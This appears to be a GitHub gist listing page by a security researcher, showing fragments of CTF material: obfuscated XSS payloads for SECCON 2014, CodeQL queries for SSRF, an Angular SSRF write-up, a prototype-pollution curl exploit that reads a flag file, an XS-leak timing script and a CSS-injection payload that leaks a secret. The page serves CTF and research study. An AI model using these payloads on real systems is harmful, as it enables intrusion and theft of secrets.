Skip to content

Instantly share code, notes, and snippets.

View fuz-scroll.js
// create viewer element
init = () => {
const renderer = document.querySelector('#renderer')
const viewer = document.createElement('div')
viewer.style = `
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
@tyage
tyage / bonsai-xss.js
Last active Oct 23, 2020
SECCON CTF 2014 Online Qualifications, XSS Bonsai writeup
View bonsai-xss.js
";hoge14='constructorhoge14'.slice(84645-84645,84656-84645);hoge15='alerthoge14'.slice(84645-84645,84650-84645);hoge16='XSShoge14'.slice(84645-84645,84648-84645);[][hoge14][hoge14](hoge15+'(\''+hoge16+'\')')()//
\";hoge17='constructorhoge17'.substr(45998-45998,46009-45998);hoge18='alerthoge17'.substr(45998-45998,46003-45998);hoge19='XSShoge17'.substr(45998-45998,46001-45998);[][hoge17][hoge17](hoge18+'(\''+hoge19+'\')')()//
',(hoge20='constructorhogee'.replace('hogee',''),hoge21='alerthogee'.replace('hogee',''),hoge22='XSShogee'.replace('hogee',''),[][hoge20][hoge20](hoge21+'(\''+hoge22+'\')')()),'
")};hoge30=88831-88831;hoge31='cccchoge30'.split('')[hoge30]+'oooohoge30'.split('')[hoge30]+'nnnnhoge30'.split('')[hoge30]+'sssshoge30'.split('')[hoge30]+'tttthoge30'.split('')[hoge30]+'rrrrhoge30'.split('')[hoge30]+'uuuuhoge30'.split('')[hoge30]+'cccchoge30'.split('')[hoge30]+'tttthoge30'.split('')[hoge30]+'oooohoge30'.split('')[hoge30]+'rrrrhoge30'.split('')[hoge30];hoge32='aaaahoge30'.split('')[hoge30]+'llllhoge
View ssrf2.ql
import javascript
import DataFlow
import DataFlow::PathGraph
class SSRFConfiguration extends TaintTracking::Configuration {
SSRFConfiguration() { this = "SSRFConfiguration" }
override predicate isSource(DataFlow::Node source) {
exists(DataFlow::SourceNode req |
isHTTPRequest(req) and
View test.ql
import javascript
import DataFlow::PathGraph
// TODO: need to add constraint of "@nguniversal/express-engine"
class Configuration extends TaintTracking::Configuration {
Configuration() { this = "Angular SSRF" }
// string not start with https?:// or //
override predicate isSource(DataFlow::Node source) {
source.getStringValue().regexpMatch("^(?!(https?:|//)).*$")
View angular-of-universe.md

flag 1 (Bypass path restriction with Angular router)

If you can render /debug/answer in server-side, you can get the first flag.

Nginx denies accesses to /debug.

  location /debug {
    # IP address restriction.
    # TODO: add allowed IP addresses here
View exploit.sh
curl http://10.13.37.$i:14017/config/validated/json-schema/validate -H 'content-type: application/json' --data '{"$schema":{"type":"object","properties":{"__proto__":{"type":"object","properties":{"outputFunctionName":{"type":"string","default":"x;var buf = Buffer.alloc(128);var fs = process.mainModule.require(`fs`);var fd=fs.openSync(`/fl`+`ag`);fs.readSync(fd, buf, 0, 128);fs.closeSync(fd);return buf.toString();//x"},"path":{"type":"string","default":"/foo"}}}}}}'
View gist:6cedcff95fa3afcb06963dffef57c542
<script>
setTimeout(() => {
(new Image()).src='/start';
var start = performance.now();
fetch("https://www.materialui.co/materialIcons/navigation/close_black_72x72.png", {
mode: "no-cors",
credentials: "include"
}).then((response) => {
var end = performance.now();
View hugo-export-with-wp-syntax.diff
1a2
>
222,223d222
< do_action('wp_print_scripts');
<
225,228d223
<
< # remove theCode
< $content = preg_replace('/<p class="theCode[^<]+<\/p>/', '', $content);
<
View 作業が100000万倍捗る不思議な.sh
echo "127.0.0.1\ttwitter.com
127.0.0.1\twww.facebook.com
127.0.0.1\tslack.com
127.0.0.1\tanond.hatelabo.jp" >> /etc/hosts
View catchat.js
prefix = 'L0LC47S_43V3R'
grecaptcha.execute(recaptcha_id, {action: 'report'}).then((token) => send('/report ' + token));
setTimeout(() => {
fetch(`send?name=${encodeURIComponent('/secret wao; Domain=a.cat-chat.web.ctfcompetition.com')}&msg=dog`)
}, 2000);
setTimeout(() => {
let payload = ''
for(let i = '0'.charCodeAt(0); i <= '9'.charCodeAt(0); ++i) {
let a = String.fromCharCode(i)
payload += `span[data-secret^=${prefix}${a}]{background:url(./send?name=a&msg=flag%20${a})}`